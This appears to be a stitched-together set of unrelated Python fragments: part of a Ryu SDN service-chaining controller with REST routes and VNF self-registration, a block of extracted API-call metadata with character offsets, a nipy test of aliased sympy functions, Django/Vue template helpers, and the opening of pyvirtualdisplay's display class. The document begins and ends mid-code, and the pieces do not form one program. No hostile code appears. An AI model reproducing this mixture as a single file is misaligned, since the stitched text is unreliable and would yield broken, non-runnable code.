for vnf in self.backward():
#dpid_out = vnf.dpid_out
actions.append(parser.OFPActionSetField(eth_dst=vnf.locator_addr_out))
sfc_app_cls.add_flow(dp, 8, match, actions, goto_id=1)
actions = []
flow_dict['in_port'] = vnf.port_out
dp = sfc_app_cls.datapaths[vnf.dpid_out]
match = sfc_app_cls.create_match(parser, flow_dict)
#################################
class SFCController(ControllerBase):
def __init__(self, req, link, data, **config):
super(SFCController, self).__init__(req, link, data, **config)
self.sfc_api_app = data['sfc_api_app']
@route('hello', '/{greeting}/{name}', methods=['GET'])
def hello(self, req, **kwargs):
greeting = kwargs['greeting']
name = kwargs['name']
message = greeting +' '+ name
privet = {'message': message}
body = json.dumps(privet)
return Response(content_type='application/json', body=body.encode('utf-8'), status=200)
@route('add-flow', '/add_flow/{flow_id}', methods=['GET'])
def api_add_flow(self, req, **kwargs):
sfc_ap = self.sfc_api_app
flow_id = kwargs['flow_id']
logging.debug('FLOW ID: %s', flow_id)
try:
flows[flow_id] = sfc(flow_id, cur=cur)
except ValueError:
message = {'Result': 'Flow {} is not defined'.format(flow_id)}
body = json.dumps(message)
return Response(content_type='application/json', body=body.encode('utf-8'), status=404)
except TypeError:
message = {'Result': 'DB inconsistency'}
body = json.dumps(message)
return Response(content_type='application/json', body=body.encode('utf-8'), status=500)
logging.debug('SFC: %s', str(flows[flow_id]))
flows[flow_id].install_catching_rule(sfc_ap)
@route('delete-flow', '/delete_flow/{flow_id}', methods=['GET'])
def api_delete_flow(self, req, **kwargs):
'''Deletes flow from the application and clears the corresponding rule from DPs '''
sfc_ap = self.sfc_api_app
flow_id = kwargs['flow_id']
cur.execute('''select * from flows where id = ?''', (kwargs['flow_id'],))
flow_spec = cur.fetchone()
flow_dict = {}
if not flow_spec: return Response(status=404)
(flow_id, name, flow_dict['in_port'], flow_dict['eth_dst'],
flow_dict['eth_src'], flow_dict['eth_type'], flow_dict['ip_proto'],
flow_dict['ipv4_src'], flow_dict['ipv4_dst'], flow_dict['tcp_src'],
flow_dict['tcp_dst'], flow_dict['udp_src'], flow_dict['udp_dst'],
flow_dict['ipv6_src'], flow_dict['ipv6_dst'], service_id) = flow_spec
if not flow_dict['eth_type']: flow_dict['eth_type'] = 0x0800
reverse_flow_dict = sfc_app_cls.reverse_flow(flow_dict)
for flow_dict in (flow_dict, reverse_flow_dict):
for dp in sfc_ap.datapaths.values():
match_del = sfc_ap.create_match(dp.ofproto_parser, flow_dict)
sfc_ap.del_flow(datapath=dp, match=match_del)
try:
del flows[str(flow_id)]
logging.debug('Flow %s deleted', flow_id)
except KeyError:
logging.debug('Flow %s not found, but an attempt to delete it from DPs has been performed', flow_id)
return Response(status=200)
@route('flows', '/flows/{flow_id}', methods=['GET'])
def api_show_flow(self, req, **kwargs):
flow_id = kwargs['flow_id']
try:
body = json.dumps({flow_id:str(flows[flow_id])})
return Response(content_type='application/json', body=body.encode('utf-8'), status=200)
except KeyError:
body = json.dumps({'ERROR':'Flow {} not found/not installed'.format(flow_id)})
return Response(content_type='application/json', body=body.encode('utf-8'), status=404)
@route('flows_all', '/flows', methods=['GET'])
def api_show_flows(self, req):
logging.debug('FLOWS: {}'.format(str(flows)))
body = json.dumps(str(flows))
return Response(content_type='application/json', body=body.encode('utf-8'), status=200)
class sfc_app_cls(app_manager.RyuApp):
OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]
_CONTEXTS = {'wsgi': WSGIApplication}
def __init__(self, *args, **kwargs):
super(sfc_app_cls, self).__init__(*args, **kwargs)
wsgi = kwargs['wsgi']
wsgi.register(SFCController, {'sfc_api_app': self})
self.datapaths = {}
######## database definition
# conn = sqlite3.connect('nfv.sqlite')
# cur = conn.cursor()
# cur.executescript('''
# DROP TABLE IF EXISTS vnf;
# CREATE TABLE vnf (
# id INTEGER NOT NULL,
# name TEXT,
# type_id INTEGER,
# group_id INTEGER,
# geo_location TEXT,
# iftype INTEGER,
# bidirectional BOOLEAN,
# dpid INTEGER,
# in_port INTEGER,
# locator_addr NUMERIC
# PRIMARY KEY(id,iftype)
# );
# create unique index equipment_uind on vnf (name,iftype)
# ''')
# conn.commit()
# cur.close()
######## END of database definition
######### Register/Unregister DataPathes in datapth dictionary
@set_ev_cls(ofp_event.EventOFPStateChange,
[MAIN_DISPATCHER, DEAD_DISPATCHER])
def _state_change_handler(self, ev):
datapath = ev.datapath
if ev.state == MAIN_DISPATCHER:
if not datapath.id in self.datapaths:
self.logger.debug('register datapath: %016x', datapath.id)
self.datapaths[datapath.id] = datapath
elif ev.state == DEAD_DISPATCHER:
if datapath.id in self.datapaths:
self.logger.debug('unregister datapath: %016x', datapath.id)
del self.datapaths[datapath.id]
########## Setting default rules upon DP is connectted
@set_ev_cls(ofp_event.EventOFPSwitchFeatures, CONFIG_DISPATCHER)
def switch_features_handler(self, ev):
datapath = ev.msg.datapath
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
#### Set flow to retrieve registration packet
match = parser.OFPMatch(eth_type=0x0800, ip_proto=17, udp_dst=30012)
actions = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER, ofproto.OFPCML_NO_BUFFER)]
self.add_flow(datapath, 1, match, actions)
#### Set defaults for table 1 and 2
match = parser.OFPMatch()
actions = []
self.add_flow(datapath, 0, match, actions, goto_id=1)
actions = [parser.OFPActionOutput(ofproto.OFPP_NORMAL,
ofproto.OFPCML_NO_BUFFER)]
self.add_flow(datapath, 0, match, actions, table_id=1)
actions = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER,
ofproto.OFPCML_NO_BUFFER)]
self.add_flow(datapath, 0, match, actions, table_id=2)
################ Packet_IN handler ####################
@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def _packet_in_handler(self, ev):
msg = ev.msg
datapath = msg.datapath
ofproto = datapath.ofproto
if msg.reason == ofproto.OFPR_NO_MATCH:
reason = 'NO MATCH'
elif msg.reason == ofproto.OFPR_ACTION:
reason = 'ACTION'
elif msg.reason == ofproto.OFPR_INVALID_TTL:
reason = 'INVALID TTL'
else:
reason = 'unknown'
self.logger.debug('OFPPacketIn received: '
'buffer_id=%x total_len=%d reason=%s '
'table_id=%d cookie=%d match=%s ',
msg.buffer_id, msg.total_len, reason,
msg.table_id, msg.cookie, msg.match)
try:
flow_match = msg.match['metadata']
if msg.match['metadata'] > DELTA:
flow_id = flow_match - DELTA
else:
flow_id = flow_match
in_port_entry = msg.match['in_port']
dp_entry = datapath
####### Deleting catching rules
logging.debug('Deleting catching rules - flow:%d match:%d ...', flow_id, flow_match)
flows[str(flow_id)].delete_rule(self, flow_match)
####### Installing steering rules
logging.debug('Installing steering rules - flow:%d match:%d ...', flow_id, flow_match)
flows[str(flow_id)].install_steering_rule(self, dp_entry, in_port_entry, flow_match)
except KeyError:
flow_match = None
pass
####### VNF self registrtation
in_port = msg.match['in_port']
pkt = packet.Packet(msg.data)
#pkt_arp = pkt.get_protocol(arp.arp)
pkt_eth = pkt.get_protocol(ethernet.ethernet)
#pkt_ip = pkt.get_protocol(ipv4.ipv4)
pkt_udp = pkt.get_protocol(udp.udp)
if pkt_udp:
if pkt_udp.dst_port == 30012:
reg_string = pkt.protocols[-1]
reg_info = json.loads(reg_string)
name = reg_info['register']['name']
vnf_id = reg_info['register']['vnf_id']
logging.debug('VNF ID from reg packet %s', vnf_id)
type_id = reg_info['register']['type_id']
group_id = reg_info['register']['group_id']
geo_location = reg_info['register']['geo_location']
iftype = reg_info['register']['iftype']
bidirectional = reg_info['register']['bidirectional']
dpid = datapath.id
locator_addr = pkt_eth.src
logging.debug("Inserting self-registartion info into DB")
cur.execute('''REPLACE INTO vnf (id, name, type_id,
group_id, geo_location, iftype, bidirectional,
dpid, in_port, locator_addr ) VALUES ( ?, ?, ?,
?, ?, ?, ?, ?, ?, ? )''',
(vnf_id, name, type_id, group_id, geo_location,
iftype, bidirectional, dpid, in_port, locator_addr)
)
cur.execute('SELECT id FROM vnf WHERE name = ? AND iftype = ?',
(name, iftype)
)
vnf_id = cur.fetchone()[0]
conn.commit()
#cur.close()
############# Function definitions #############
def add_flow(self, datapath, priority, match, actions,
buffer_id=None, table_id=0, metadata=None, goto_id=None):
logging.debug("Add flow to DP %d", datapath.id)
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
if goto_id:
#inst = [parser.OFPInstructionActions(ofproto.OFPIT_WRITE_ACTIONS, actions)]
inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS, actions)]
if metadata:
inst.append(parser.OFPInstructionWriteMetadata(metadata, 0xffffffff))
inst.append(parser.OFPInstructionGotoTable(goto_id))
else:
inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS, actions)]
#inst.append(parser.OFPInstructionWriteMetadata(1,0xffffffff))
if buffer_id:
mod = parser.OFPFlowMod(datapath=datapath, buffer_id=buffer_id,
priority=priority, match=match,
instructions=inst, table_id=table_id)
else:
mod = parser.OFPFlowMod(datapath=datapath, priority=priority,
match=match, instructions=inst,
table_id=table_id)
datapath.send_msg(mod)
def del_flow(self, datapath, match):
''' Deletes a flow defined by match from a DP '''
logging.debug("Delele flow from DP %d", datapath.id)
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
mod = parser.OFPFlowMod(datapath=datapath,
command=ofproto.OFPFC_DELETE,
out_port=ofproto.OFPP_ANY,
out_group=ofproto.OFPG_ANY,
match=match)
datapath.send_msg(mod)
def create_match(self, parser, fields):
'''Creates OFP match struct from the list of fields. New API.'''
flow_dict = {}
for k, v in fields.items():
if v is not None:
flow_dict[k] = v
match = parser.OFPMatch(**flow_dict)
return match
def reverse_flow(flow_dict):
'''Creates reverse flow dict '''
reverse_flow_dict = {**flow_dict}
reverse_flow_dict['eth_src'] = flow_dict['eth_dst']
reverse_flow_dict['eth_dst'] = flow_dict['eth_src']
reverse_flow_dict['ipv4_src'] = flow_dict['ipv4_dst']
reverse_flow_dict['ipv4_dst'] = flow_dict['ipv4_src']
reverse_flow_dict['tcp_src'] = flow_dict['tcp_dst']
reverse_flow_dict['tcp_dst'] = flow_dict['tcp_src']
reverse_flow_dict['udp_src'] = flow_dict['udp_dst']
reverse_flow_dict['udp_dst'] = flow_dict['udp_src']
reverse_flow_dict['ipv6_src'] = flow_dict['ipv6_dst']
reverse_flow_dict['ipv6_dst'] = flow_dict['ipv6_src']
return reverse_flow_dict
| [
"ryu.lib.packet.packet.Packet",
"json.loads",
"logging.debug",
"ryu.app.wsgi.route",
"sqlite3.connect",
"json.dumps",
"ryu.controller.handler.set_ev_cls",
"webob.Response"
] | [((519, 548), 'sqlite3.connect', 'sqlite3.connect', (['"""nfv.sqlite"""'], {}), "('nfv.sqlite')\n", (534, 548), False, 'import sqlite3\n'), ((6145, 6198), 'ryu.app.wsgi.route', 'route', (['"""hello"""', '"""/{greeting}/{name}"""'], {'methods': "['GET']"}), "('hello', '/{greeting}/{name}', methods=['GET'])\n", (6150, 6198), False, 'from ryu.app.wsgi import ControllerBase, WSGIApplication, route\n'), ((6515, 6572), 'ryu.app.wsgi.route', 'route', (['"""add-flow"""', '"""/add_flow/{flow_id}"""'], {'methods': "['GET']"}), "('add-flow', '/add_flow/{flow_id}', methods=['GET'])\n", (6520, 6572), False, 'from ryu.app.wsgi import ControllerBase, WSGIApplication, route\n'), ((7369, 7432), 'ryu.app.wsgi.route', 'route', (['"""delete-flow"""', '"""/delete_flow/{flow_id}"""'], {'methods': "['GET']"}), "('delete-flow', '/delete_flow/{flow_id}', methods=['GET'])\n", (7374, 7432), False, 'from ryu.app.wsgi import ControllerBase, WSGIApplication, route\n'), ((8883, 8934), 'ryu.app.wsgi.route', 'route', (['"""flows"""', '"""/flows/{flow_id}"""'], {'methods': "['GET']"}), "('flows', '/flows/{flow_id}', methods=['GET'])\n", (8888, 8934), False, 'from ryu.app.wsgi import ControllerBase, WSGIApplication, route\n'), ((9411, 9456), 'ryu.app.wsgi.route', 'route', (['"""flows_all"""', '"""/flows"""'], {'methods': "['GET']"}), "('flows_all', '/flows', methods=['GET'])\n", (9416, 9456), False, 'from ryu.app.wsgi import ControllerBase, WSGIApplication, route\n'), ((10832, 10909), 'ryu.controller.handler.set_ev_cls', 'set_ev_cls', (['ofp_event.EventOFPStateChange', '[MAIN_DISPATCHER, DEAD_DISPATCHER]'], {}), '(ofp_event.EventOFPStateChange, [MAIN_DISPATCHER, DEAD_DISPATCHER])\n', (10842, 10909), False, 'from ryu.controller.handler import set_ev_cls\n'), ((11493, 11556), 'ryu.controller.handler.set_ev_cls', 'set_ev_cls', (['ofp_event.EventOFPSwitchFeatures', 'CONFIG_DISPATCHER'], {}), '(ofp_event.EventOFPSwitchFeatures, CONFIG_DISPATCHER)\n', (11503, 11556), False, 'from 
ryu.controller.handler import set_ev_cls\n'), ((12588, 12643), 'ryu.controller.handler.set_ev_cls', 'set_ev_cls', (['ofp_event.EventOFPPacketIn', 'MAIN_DISPATCHER'], {}), '(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)\n', (12598, 12643), False, 'from ryu.controller.handler import set_ev_cls\n'), ((1270, 1325), 'logging.debug', 'logging.debug', (['"""Locator addr: %s"""', 'self.locator_addr_in'], {}), "('Locator addr: %s', self.locator_addr_in)\n", (1283, 1325), False, 'import logging\n'), ((3466, 3515), 'logging.debug', 'logging.debug', (['"""Trying to append %s"""', 'next_vnf_id'], {}), "('Trying to append %s', next_vnf_id)\n", (3479, 3515), False, 'import logging\n'), ((3614, 3641), 'logging.debug', 'logging.debug', (['"""Filling..."""'], {}), "('Filling...')\n", (3627, 3641), False, 'import logging\n'), ((3784, 3824), 'logging.debug', 'logging.debug', (['"""Adding catching rule..."""'], {}), "('Adding catching rule...')\n", (3797, 3824), False, 'import logging\n'), ((4245, 4265), 'webob.Response', 'Response', ([], {'status': '(200)'}), '(status=200)\n', (4253, 4265), False, 'from webob import Response\n'), ((4327, 4360), 'logging.debug', 'logging.debug', (['"""Deleting rule..."""'], {}), "('Deleting rule...')\n", (4340, 4360), False, 'import logging\n'), ((4692, 4732), 'logging.debug', 'logging.debug', (['"""Adding steering rule..."""'], {}), "('Adding steering rule...')\n", (4705, 4732), False, 'import logging\n'), ((6394, 6412), 'json.dumps', 'json.dumps', (['privet'], {}), '(privet)\n', (6404, 6412), False, 'import json\n'), ((6695, 6732), 'logging.debug', 'logging.debug', (['"""FLOW ID: %s"""', 'flow_id'], {}), "('FLOW ID: %s', flow_id)\n", (6708, 6732), False, 'import logging\n'), ((8856, 8876), 'webob.Response', 'Response', ([], {'status': '(200)'}), '(status=200)\n', (8864, 8876), False, 'from webob import Response\n'), ((14248, 14271), 'ryu.lib.packet.packet.Packet', 'packet.Packet', (['msg.data'], {}), '(msg.data)\n', (14261, 14271), False, 'from 
ryu.lib.packet import packet\n'), ((16183, 16230), 'logging.debug', 'logging.debug', (['"""Add flow to DP %d"""', 'datapath.id'], {}), "('Add flow to DP %d', datapath.id)\n", (16196, 16230), False, 'import logging\n'), ((17451, 17503), 'logging.debug', 'logging.debug', (['"""Delele flow from DP %d"""', 'datapath.id'], {}), "('Delele flow from DP %d', datapath.id)\n", (17464, 17503), False, 'import logging\n'), ((1870, 1918), 'logging.debug', 'logging.debug', (['"""Flow %s is not defined"""', 'flow_id'], {}), "('Flow %s is not defined', flow_id)\n", (1883, 1918), False, 'import logging\n'), ((7816, 7836), 'webob.Response', 'Response', ([], {'status': '(404)'}), '(status=404)\n', (7824, 7836), False, 'from webob import Response\n'), ((8661, 8702), 'logging.debug', 'logging.debug', (['"""Flow %s deleted"""', 'flow_id'], {}), "('Flow %s deleted', flow_id)\n", (8674, 8702), False, 'import logging\n'), ((13699, 13787), 'logging.debug', 'logging.debug', (['"""Deleting catching rules - flow:%d match:%d ..."""', 'flow_id', 'flow_match'], {}), "('Deleting catching rules - flow:%d match:%d ...', flow_id,\n flow_match)\n", (13712, 13787), False, 'import logging\n'), ((13894, 13984), 'logging.debug', 'logging.debug', (['"""Installing steering rules - flow:%d match:%d ..."""', 'flow_id', 'flow_match'], {}), "('Installing steering rules - flow:%d match:%d ...', flow_id,\n flow_match)\n", (13907, 13984), False, 'import logging\n'), ((6918, 6937), 'json.dumps', 'json.dumps', (['message'], {}), '(message)\n', (6928, 6937), False, 'import json\n'), ((7136, 7155), 'json.dumps', 'json.dumps', (['message'], {}), '(message)\n', (7146, 7155), False, 'import json\n'), ((8740, 8850), 'logging.debug', 'logging.debug', (['"""Flow %s not found, but an attempt to delete it from DPs has been performed"""', 'flow_id'], {}), "(\n 'Flow %s not found, but an attempt to delete it from DPs has been performed'\n , flow_id)\n", (8753, 8850), False, 'import logging\n'), ((14598, 14620), 'json.loads', 
'json.loads', (['reg_string'], {}), '(reg_string)\n', (14608, 14620), False, 'import json\n'), ((14745, 14795), 'logging.debug', 'logging.debug', (['"""VNF ID from reg packet %s"""', 'vnf_id'], {}), "('VNF ID from reg packet %s', vnf_id)\n", (14758, 14795), False, 'import logging\n'), ((15202, 15259), 'logging.debug', 'logging.debug', (['"""Inserting self-registartion info into DB"""'], {}), "('Inserting self-registartion info into DB')\n", (15215, 15259), False, 'import logging\n')] |
"""
This module tests nipy's uses of aliased sympy expressions.
That is, sympy.Function's whose value is an arbitrary callable.
In these tests, the callable's are scipy.interpolate.interp1d instances
representing approximations to Brownian Motions.
"""
import numpy as np
import scipy.interpolate
import pylab
import sympy
from nipy.modalities.fmri import formula, aliased
def gen_BrownianMotion():
X = np.arange(0,5,0.01)
y = np.random.standard_normal((500,))
Y = np.cumsum(y)*np.sqrt(0.01)
B = scipy.interpolate.interp1d(X, Y, bounds_error=0)
return B
def test_1d():
B = gen_BrownianMotion()
Bs = formula.aliased_function("B", B)
t = sympy.DeferredVector('t')
n={}; aliased._add_aliases_to_namespace(n, Bs)
expr = 3*sympy.exp(Bs(t)) + 4
ee = sympy.lambdify(t, expr, (n, 'numpy'))
np.testing.assert_almost_equal(ee(B.x), 3*np.exp(B.y)+4)
def test_2d():
B1, B2 = [gen_BrownianMotion() for _ in range(2)]
B1s = formula.aliased_function("B1", B1)
B2s = formula.aliased_function("B2", B2)
t = sympy.DeferredVector('t')
s = sympy.DeferredVector('s')
e = B1s(s)+B2s(t)
n={}; aliased._add_aliases_to_namespace(n, e)
ee = sympy.lambdify((s,t), e, (n, 'numpy'))
np.testing.assert_almost_equal(ee(B1.x, B2.x), B1.y + B2.y)
| [
"numpy.random.standard_normal",
"numpy.sqrt",
"numpy.arange",
"nipy.modalities.fmri.aliased._add_aliases_to_namespace",
"sympy.lambdify",
"numpy.exp",
"nipy.modalities.fmri.formula.aliased_function",
"numpy.cumsum",
"sympy.DeferredVector"
] | [((411, 432), 'numpy.arange', 'np.arange', (['(0)', '(5)', '(0.01)'], {}), '(0, 5, 0.01)\n', (420, 432), True, 'import numpy as np\n'), ((439, 472), 'numpy.random.standard_normal', 'np.random.standard_normal', (['(500,)'], {}), '((500,))\n', (464, 472), True, 'import numpy as np\n'), ((633, 665), 'nipy.modalities.fmri.formula.aliased_function', 'formula.aliased_function', (['"""B"""', 'B'], {}), "('B', B)\n", (657, 665), False, 'from nipy.modalities.fmri import formula, aliased\n'), ((674, 699), 'sympy.DeferredVector', 'sympy.DeferredVector', (['"""t"""'], {}), "('t')\n", (694, 699), False, 'import sympy\n'), ((711, 751), 'nipy.modalities.fmri.aliased._add_aliases_to_namespace', 'aliased._add_aliases_to_namespace', (['n', 'Bs'], {}), '(n, Bs)\n', (744, 751), False, 'from nipy.modalities.fmri import formula, aliased\n'), ((796, 833), 'sympy.lambdify', 'sympy.lambdify', (['t', 'expr', "(n, 'numpy')"], {}), "(t, expr, (n, 'numpy'))\n", (810, 833), False, 'import sympy\n'), ((977, 1011), 'nipy.modalities.fmri.formula.aliased_function', 'formula.aliased_function', (['"""B1"""', 'B1'], {}), "('B1', B1)\n", (1001, 1011), False, 'from nipy.modalities.fmri import formula, aliased\n'), ((1022, 1056), 'nipy.modalities.fmri.formula.aliased_function', 'formula.aliased_function', (['"""B2"""', 'B2'], {}), "('B2', B2)\n", (1046, 1056), False, 'from nipy.modalities.fmri import formula, aliased\n'), ((1066, 1091), 'sympy.DeferredVector', 'sympy.DeferredVector', (['"""t"""'], {}), "('t')\n", (1086, 1091), False, 'import sympy\n'), ((1100, 1125), 'sympy.DeferredVector', 'sympy.DeferredVector', (['"""s"""'], {}), "('s')\n", (1120, 1125), False, 'import sympy\n'), ((1159, 1198), 'nipy.modalities.fmri.aliased._add_aliases_to_namespace', 'aliased._add_aliases_to_namespace', (['n', 'e'], {}), '(n, e)\n', (1192, 1198), False, 'from nipy.modalities.fmri import formula, aliased\n'), ((1209, 1248), 'sympy.lambdify', 'sympy.lambdify', (['(s, t)', 'e', "(n, 'numpy')"], {}), "((s, t), e, (n, 
'numpy'))\n", (1223, 1248), False, 'import sympy\n'), ((481, 493), 'numpy.cumsum', 'np.cumsum', (['y'], {}), '(y)\n', (490, 493), True, 'import numpy as np\n'), ((494, 507), 'numpy.sqrt', 'np.sqrt', (['(0.01)'], {}), '(0.01)\n', (501, 507), True, 'import numpy as np\n'), ((881, 892), 'numpy.exp', 'np.exp', (['B.y'], {}), '(B.y)\n', (887, 892), True, 'import numpy as np\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import re
import sys
import jsbeautifier
from bs4 import BeautifulSoup
from django.apps import apps
from django.conf import settings
from django.template.loader import render_to_string
from editorconfig import PathError
def flatten(lst: []) -> []:
if not isinstance(lst, (list, tuple)):
return [lst]
if not lst:
return lst
return flatten(lst[0]) + flatten(lst[1:])
def convert_to_pascalcase(string: str) -> str:
return "".join(
[word.capitalize() for word in re.findall(r"[a-zA-Z0-9]+", string)])
def convert_to_camelcase(string: str) -> str:
string = convert_to_pascalcase(string)
return string[0].lower() + string[1:]
def convert_to_kebab_case(string: str) -> str:
return re.sub('(?!^)([A-Z])', r'-\1', string).lower()
def replace(match: str) -> str:
return ':' + match.groups()[-1]
def render_to_js_string(template: str, context: {}):
output = render_to_string(template, context)
options = jsbeautifier.default_options()
opts_file = getattr(settings, 'EDITOR_CONFIG', '.editorconfig')
options.brace_style = 'collapse,preserve-inline'
try:
jsbeautifier.set_file_editorconfig_opts(opts_file, options)
except PathError:
log("No editor config found at: {opts_file}")
log("Using defaults.")
return jsbeautifier.beautify(output, opts=options)
def render_to_html_string(template, context):
    """Render *template* with *context*, breaking lines after ``</label>``.

    TODO: find a nicer library to pretty-print HTML.  The previous
    BeautifulSoup ``prettify()`` path was dead code behind an ``if True:``
    guard and has been removed; behavior is unchanged.
    """
    output = render_to_string(template, context)
    return output.replace('</label>', '</label>\n')
def as_vue(self):
    """Render a Django form's fields as Vue-flavoured HTML.

    Defined at module level with a ``self`` parameter — presumably attached
    to a Form class elsewhere; TODO confirm against the caller.  Swaps every
    field widget's template from the stock ``django/forms`` templates to the
    ``djue`` overrides, then delegates to the form's ``_html_output``.
    """
    for name, field in self.fields.items():
        template: str = field.widget.template_name
        # Point each widget at the djue template overrides.
        field.widget.template_name = template.replace('django/forms', 'djue')
    return self._html_output(
        normal_row='<div%(html_class_attr)s> %(field)s%('
                   'help_text)s</div>',
        error_row='%s',
        row_ender='</div>',
        help_text_html=' <span class="helptext">%s</span>',
        errors_on_separate_row=True)
def get_app_name(obj):
    """Best-effort lookup of the Django app name an object belongs to.

    Falls back to the first segment of the object's module path when the
    object is not registered with any installed app.
    """
    try:
        config = apps.get_containing_app_config(obj.__module__)
        return config.name
    except AttributeError:
        log("Object is not part of an app. About to do stupid shit")
        return obj.__module__.split('.')[0]
def convert_file_to_component_name(path):
    """Derive a PascalCase component name from a file path's base name."""
    basename = path.split(os.path.sep)[-1]
    stem = basename.split('.')[0]
    return convert_to_pascalcase(stem.capitalize())
def log(msg):
    """Write *msg* followed by a newline to standard output."""
    for chunk in (msg, '\n'):
        sys.stdout.write(chunk)
def get_output_path():
    """Return (creating it if needed) the ``src`` directory under the output root.

    The root defaults to the current working directory unless
    ``settings.DJUE_OUTPUT_DIR`` is configured.
    """
    root = getattr(settings, 'DJUE_OUTPUT_DIR', os.getcwd())
    src_dir = os.path.join(root, 'src')
    os.makedirs(src_dir, exist_ok=True)
    return src_dir
| [
"os.makedirs",
"jsbeautifier.set_file_editorconfig_opts",
"jsbeautifier.default_options",
"os.path.join",
"os.getcwd",
"bs4.BeautifulSoup",
"django.apps.apps.get_containing_app_config",
"re.sub",
"re.findall",
"jsbeautifier.beautify",
"django.template.loader.render_to_string",
"sys.stdout.writ... | [((979, 1014), 'django.template.loader.render_to_string', 'render_to_string', (['template', 'context'], {}), '(template, context)\n', (995, 1014), False, 'from django.template.loader import render_to_string\n'), ((1029, 1059), 'jsbeautifier.default_options', 'jsbeautifier.default_options', ([], {}), '()\n', (1057, 1059), False, 'import jsbeautifier\n'), ((1378, 1421), 'jsbeautifier.beautify', 'jsbeautifier.beautify', (['output'], {'opts': 'options'}), '(output, opts=options)\n', (1399, 1421), False, 'import jsbeautifier\n'), ((1654, 1689), 'django.template.loader.render_to_string', 'render_to_string', (['template', 'context'], {}), '(template, context)\n', (1670, 1689), False, 'from django.template.loader import render_to_string\n'), ((1701, 1737), 'bs4.BeautifulSoup', 'BeautifulSoup', (['output', '"""html.parser"""'], {}), "(output, 'html.parser')\n", (1714, 1737), False, 'from bs4 import BeautifulSoup\n'), ((2667, 2688), 'sys.stdout.write', 'sys.stdout.write', (['msg'], {}), '(msg)\n', (2683, 2688), False, 'import sys\n'), ((2693, 2715), 'sys.stdout.write', 'sys.stdout.write', (['"""\n"""'], {}), "('\\n')\n", (2709, 2715), False, 'import sys\n'), ((2813, 2838), 'os.path.join', 'os.path.join', (['root', '"""src"""'], {}), "(root, 'src')\n", (2825, 2838), False, 'import os\n'), ((2843, 2875), 'os.makedirs', 'os.makedirs', (['path'], {'exist_ok': '(True)'}), '(path, exist_ok=True)\n', (2854, 2875), False, 'import os\n'), ((1199, 1258), 'jsbeautifier.set_file_editorconfig_opts', 'jsbeautifier.set_file_editorconfig_opts', (['opts_file', 'options'], {}), '(opts_file, options)\n', (1238, 1258), False, 'import jsbeautifier\n'), ((1548, 1583), 'django.template.loader.render_to_string', 'render_to_string', (['template', 'context'], {}), '(template, context)\n', (1564, 1583), False, 'from django.template.loader import render_to_string\n'), ((2789, 2800), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2798, 2800), False, 'import os\n'), ((794, 832), 
're.sub', 're.sub', (['"""(?!^)([A-Z])"""', '"""-\\\\1"""', 'string'], {}), "('(?!^)([A-Z])', '-\\\\1', string)\n", (800, 832), False, 'import re\n'), ((2296, 2342), 'django.apps.apps.get_containing_app_config', 'apps.get_containing_app_config', (['obj.__module__'], {}), '(obj.__module__)\n', (2326, 2342), False, 'from django.apps import apps\n'), ((562, 596), 're.findall', 're.findall', (['"""[a-zA-Z0-9]+"""', 'string'], {}), "('[a-zA-Z0-9]+', string)\n", (572, 596), False, 'import re\n')] |
import fnmatch
import logging
import os
import select
import signal
import subprocess
import tempfile
import time
from threading import Lock
from easyprocess import EasyProcess, EasyProcessError
from pyvirtualdisplay import xauth
from pyvirtualdisplay.util import get_helptext, py2
# try:
# import fcntl
# except ImportError:
# fcntl = None
# Guards the free-display search so concurrent starts do not pick the same
# display number within this process.
_mutex = Lock()
log = logging.getLogger(__name__)
# Display numbers below this are left to "real" X servers.
_MIN_DISPLAY_NR = 1000
# Display numbers already handed out by this process.
_USED_DISPLAY_NR_LIST = []
# Seconds to wait for the X server to come up, and the polling intervals used
# while waiting.
_X_START_TIMEOUT = 10
_X_START_TIME_STEP = 0.1
_X_START_WAIT = 0.1
class XStartTimeoutError(Exception):
    """Raised when the X server does not become ready within the timeout."""
    pass
class XStartError(Exception):
    """Raised when the X server process fails to start or exits early."""
    pass
def _lock_files():
tmpdir = "/tmp"
try:
ls = os.listdir(tmpdir)
except FileNotFoundError:
log.warning("missing /tmp")
return []
pattern = ".X*-lock"
names = fnmatch.filter(ls, pattern)
ls = [os.path.join(tmpdir, child) for child in names]
ls = [p for p in ls if os.path.isfile(p)]
return ls
def _search_for_display(randomizer=None):
    """Pick a candidate display number.

    When a randomizer is supplied it wins; otherwise the number is derived
    from existing lock files (max + 3), never below ``_MIN_DISPLAY_NR``.
    """
    lock_numbers = [
        int(path.split("X")[1].split("-")[0]) for path in _lock_files()
    ]
    if lock_numbers:
        display = max(_MIN_DISPLAY_NR, max(lock_numbers) + 3)
    else:
        display = _MIN_DISPLAY_NR
    if randomizer:
        display = randomizer.generate()
    return display
class AbstractDisplay(object):
    """
    Common parent for X servers (Xvfb,Xephyr,Xvnc)
    """
    def __init__(self, program, use_xauth, randomizer, retries, extra_args):
        # Launch configuration for the X server subprocess.
        self._extra_args = extra_args
        self._retries = retries
        self._program = program
        self._randomizer = randomizer
        self.stdout = None
        self.stderr = None
        self.old_display_var = None
        self._subproc = None
        self.display = None
        self.is_started = False
        # "-displayfd" lets the X server report the display number it picked
        # over a pipe; without it we must search for a free display ourselves
        # and poll with xdpyinfo.
        helptext = get_helptext(program)
        self._has_displayfd = "-displayfd" in helptext
        if not self._has_displayfd:
            log.debug("-displayfd flag is missing.")
        # if check_startup and not has_displayfd:
        #     check_startup = False
        #     log.warning(
        #         program
        #         + " -displayfd flag is not supported, 'check_startup' parameter has been disabled"
        #     )
        self._check_flags(helptext)
        if use_xauth and not xauth.is_installed():
            raise xauth.NotFoundError()
        self._use_xauth = use_xauth
        self._old_xauth = None
        self._xauth_filename = None
        # self.check_startup = check_startup
        # if check_startup and not fcntl:
        #     self.check_startup = False
        #     log.warning(
        #         "fcntl module can't be imported, 'check_startup' parameter has been disabled"
        #     )
        #     log.warning("fnctl module does not exist on Windows")
        # if self.check_startup:
